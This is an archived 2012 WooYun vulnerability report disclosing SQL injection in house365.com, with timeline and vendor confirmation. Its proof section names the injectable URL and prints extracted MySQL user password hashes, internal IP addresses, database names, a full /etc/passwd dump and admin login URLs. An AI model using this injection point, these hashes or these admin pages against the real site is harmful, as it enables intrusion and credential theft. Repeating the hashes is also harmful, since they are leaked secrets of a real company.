当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010549

漏洞标题:365地产家居网SQL注射漏洞

相关厂商:365地产家居网

漏洞作者: se55i0n

提交时间:2012-08-08 17:27

修复时间:2012-09-22 17:28

公开时间:2012-09-22 17:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-08: 细节已通知厂商并且等待厂商处理中
2012-08-08: 厂商已经确认,细节仅向厂商公开
2012-08-18: 细节向核心白帽子及相关领域专家公开
2012-08-28: 细节向普通白帽子公开
2012-09-07: 细节向实习白帽子公开
2012-09-22: 细节向公众公开

简要描述:

sql注射,不解释!

详细说明:

哎,一个服务器上多个house365.com的库;个城市的house365.com后台具有通用性极易猜解;太累了,就不一个一个去破解密码了!!!
测试注入点:http://wh.house365.com/xiaoqu/block_details.php?bid=58

漏洞证明:

Host IP:	121.52.227.37
Web Server: Apache
DB Server: MySQL
Current User: root@172.17.1.82
Sql Version: 5.1.51-log
Current DB: wh_house
System User: root@172.17.1.82
Host Name: 2sf_db_bak2
Installation dir: /service/mysql/
DB User & Pass: root:*DE861DC96983B6BC6620E30F91674C75277906F0:localhost
root::2sf_db_bak2
root::127.0.0.1
::localhost
::2sf_db_bak2
root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.51
root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.174
root:5f0c21d3626f1d71:172.17.1.187
root:5f0c21d3626f1d71:172.17.1.205
root:5f0c21d3626f1d71:172.17.1.81
root:5f0c21d3626f1d71:172.17.1.210
myadm:26afe479587e2980:172.17.1.210
myadm:26afe479587e2980:172.17.1.81
myadm:26afe479587e2980:172.17.1.205
myadm:26afe479587e2980:172.17.1.187
root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.201
root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.176
root:5f0c21d3626f1d71:172.17.1.208
root:5f0c21d3626f1d71:172.17.1.34
root:5f0c21d3626f1d71:172.17.1.231
root:*DE861DC96983B6BC6620E30F91674C75277906F0:221.226.121.114
root:5f0c21d3626f1d71:221.226.121.162
root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.76
root:5f0c21d3626f1d71:172.17.1.2
root:5f0c21d3626f1d71:172.17.1.203
root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.232
binlog:*D2F4F42A31551369CD7B4086C993EA9BDE75F46E:202.91.250.136
root:5f0c21d3626f1d71:172.17.1.56
myadm:26afe479587e2980:172.17.1.208
root:*DE861DC96983B6BC6620E30F91674C75277906F0:180.99.144.244
root:5f0c21d3626f1d71:172.17.1.233
root:5f0c21d3626f1d71:172.17.1.73
root:5f0c21d3626f1d71:172.17.1.72
root:5f0c21d3626f1d71:172.17.1.71
myadm:26afe479587e2980:172.17.1.71
myadm:26afe479587e2980:172.17.1.72
myadm:26afe479587e2980:172.17.1.73
root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.48
root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.171
root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.172
root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.173
binlog:*D2F4F42A31551369CD7B4086C993EA9BDE75F46E:115.238.101.235
root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.67
root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.113
myadm:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.67
root:*DE861DC96983B6BC6620E30F91674C75277906F0:221.231.141.140
root:5f0c21d3626f1d71:172.17.1.82
Data Bases: information_schema
cz_house
hf_house
house
hz_house
hz_house_20120227
hz_house_bak
hz_house_bak_20120227
ks_house
mysql
sz_house
sz_house_back
sz_house_bak
test
wh_house
wh_house_old
wx_house
xa_house


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP
User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD
Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory
owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
oprofile:x:16:16:Special user account to be
used by OProfile:/home/oprofile:/sbin/nologin
sshd:x:74:74:Privilege-separated
SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service
User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS
User:/var/lib/nfs:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
xfs:x:43:43:X Font
Server:/etc/X11/fs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
webroot:x:500:500::/home/webroot:/sbin/nologin
mysql:x:501:501::/home/mysql:/sbin/nologin
squid:x:502:502::/home/squid:/bin/bash
public:x:503:503::/home/public:/bin/bash
zabbix:x:504:504::/home/zabbix:/sbin/nologin


部分后台地址:http://wh.house365.com/admincp/login.php
http://xa.house365.com/admincp/login.php
http://cz.house365.com/admin/
http://hz.house365.com/admin/

修复方案:

过滤,隐藏后台!

版权声明:转载请注明来源 se55i0n@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-08-08 21:12

厂商回复:

感谢 se55i0n@乌云 的提交,我们自查中!

最新状态:

暂无